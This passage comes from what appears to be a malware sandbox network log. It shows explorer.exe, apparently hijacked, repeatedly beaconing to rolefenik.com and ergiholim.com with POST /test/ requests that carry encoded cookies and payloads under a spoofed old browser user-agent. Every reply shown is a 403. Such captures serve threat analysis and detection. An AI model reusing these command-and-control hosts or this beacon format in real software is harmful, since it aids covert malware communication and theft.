2024-11-13 17:22:11 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:11 UTC | 750 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lE99fMUywD0D83ClWp8fkDocta8SIrOUqVJhbllZK8BOalTHQb2le%2B6FpN%2Fpfa3RfRRL%2BnJiRsMJo1t4tqAzWiwr1FRvRquLMzp7tg4gsBbOecOQfbosDT7%2BnuBXBpnb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20714488bce381-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137933&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=21153&cwnd=32&unsent_bytes=0&cid=947b1b9a7ade8918&ts=624&x=0"
2024-11-13 17:22:11 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50014 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:12 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:12 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:13 UTC | 750 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vBtSPqmxyrDyJkwix5qrnt1vDvxLIih5%2BzmEa8Mpg26g5%2FRfxNfvqAevPswy1rH37yK9PPgZOftMqPWbbuuFJr4o%2FpRf1w0GjVs2bTqc9xu5Ty1mkm4dbJXT%2B3egor2x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20714e1cd97343-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=159109&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=19007&cwnd=32&unsent_bytes=0&cid=d108ffc8d6860c68&ts=744&x=0"
2024-11-13 17:22:13 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50015 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:14 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:14 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:15 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:14 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvSmXj%2F%2FqmB6eitwB0UhijrFrICaGR%2FWE06adn4uaNGIw872uHPkLIeDMAH8JT%2FnqCUnadLM748brKiJAGQ5iaqZPJ40m%2B2pD3pwRXVYPgCIU5tJ%2BhKvHNcfekodJbq5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071582e11d75c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130440&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22173&cwnd=32&unsent_bytes=0&cid=79abd2e80f78800c&ts=811&x=0"
2024-11-13 17:22:15 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50016 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:15 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:15 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:16 UTC | 760 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oLqfR3iLDMGNOiUQ2gOoNu%2BetsYhNLbtJ5e11e3MkZa9AmZrDwdn02mP1zuSr9C9fsl%2FBrmK3TxagTdZTzw2XR8amlG%2F%2F%2Fp%2BWvS%2ByqaBU%2FGQ%2BxgpaQCYHqMs7xPYn4Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207162b8d68072-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130311&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=22228&cwnd=32&unsent_bytes=0&cid=6e9b253a75976fe3&ts=710&x=0"
2024-11-13 17:22:16 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50017 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:17 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:17 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:17 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:17 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cStJcZhAMkzdJIeXYFhmbgRIS0hVWpDULUOP%2BXC9Q8iVBG9pbLYnwz5VzmxR%2FIiBUwtqkIkkRCFg4Kkz8Xr649eEYsAPsp4aiF79HW2gmtZ8aqOMOpjtvpZNgeEOOes6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20716ab9e2e83f-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=1678840&cwnd=251&unsent_bytes=0&cid=26728fb0c55359b4&ts=439&x=0"
                                                                                                                                          2024-11-13 17:22:17 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          27 | 192.168.2.6 | 50018 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:18 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:18 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:18 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:18 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZkCJJz9GHb7NR2zmjo8DpZbGZClUPv7r6uth0raAbl2ijQpuhJLfIMkAn4D4Rm1%2Fld4v3esqTUXqlLt1TZfSIWrULQQBychNAqmdgp4iblnkEo5vq2t0sI9%2BbMjXcfB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071716ed12cb2-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1540&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1857601&cwnd=251&unsent_bytes=0&cid=1247669daad8c299&ts=394&x=0"
                                                                                                                                          2024-11-13 17:22:18 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          28 | 192.168.2.6 | 50019 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:19 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:19 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:20 UTC | 744 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:20 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WH5Airkvd6EM7%2FL8EiezsrnbczJvlTaEFxVCvRBhsNDb0KMmvWHs3egnJa1MtE2W3iFHgpflnqDtJuSM0DzyeleOhuUTd7W8FoIixWSDFawxtopb7k7dhzfET8r2D0HQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20717a3d55f611-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=161599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=16773&cwnd=32&unsent_bytes=0&cid=6608eb3e6b33cf5f&ts=811&x=0"
                                                                                                                                          2024-11-13 17:22:20 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          29 | 192.168.2.6 | 50020 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:21 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:21 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:22 UTC | 758 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrhKCms9rG%2FoJ%2B%2F9gGRAc00MgCaOhXMiMoizs0uOMxRFCwOVgK5hy%2Fq%2BMNerNqPMw8R%2B91XqU%2BS60k5sRHw7zL9FYy5UyPrthbT5DbwHns3kBhe%2FKzLtMWXur9OxHXWG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207184aca71da7-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=21048&cwnd=32&unsent_bytes=0&cid=3bba51ff7b12d286&ts=756&x=0"
                                                                                                                                          2024-11-13 17:22:22 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          30 | 192.168.2.6 | 50021 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:23 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:23 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:23 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHYC3VgTFsavj47x5Ipq2yZSQTrs2q%2BhmAjDIjGnjkvL%2B1MjN0Pb9pm30O4X4QuSTBIioZKOovDW1oP7ZYcRoY1WTV5Zt0ZrqNTUUM4ep%2FBit0p%2FgOt%2BQdciG5HGwaxK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20718ec87cd761-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=134973&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22055&cwnd=32&unsent_bytes=0&cid=5b8874c85e3848f9&ts=547&x=0"
2024-11-13 17:22:23 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 50022 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:24 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:24 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:25 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2a1oFCT3lljdO7TIzVzNTehfzuohZWgRmd68L8poYRkSm2q%2F62yJdxR8x32WeAEuHDUdx05%2FpobZRlPwP0p%2BPZWY7nxmneM40a4rSDP0u%2FYT8z5Oth1lBquHxDjPiI5%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207199ee15d75c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=132863&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=21475&cwnd=32&unsent_bytes=0&cid=dd1e6a571e8d3ab3&ts=747&x=0"
2024-11-13 17:22:25 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 50023 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:26 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:26 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:26 UTC | 749 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
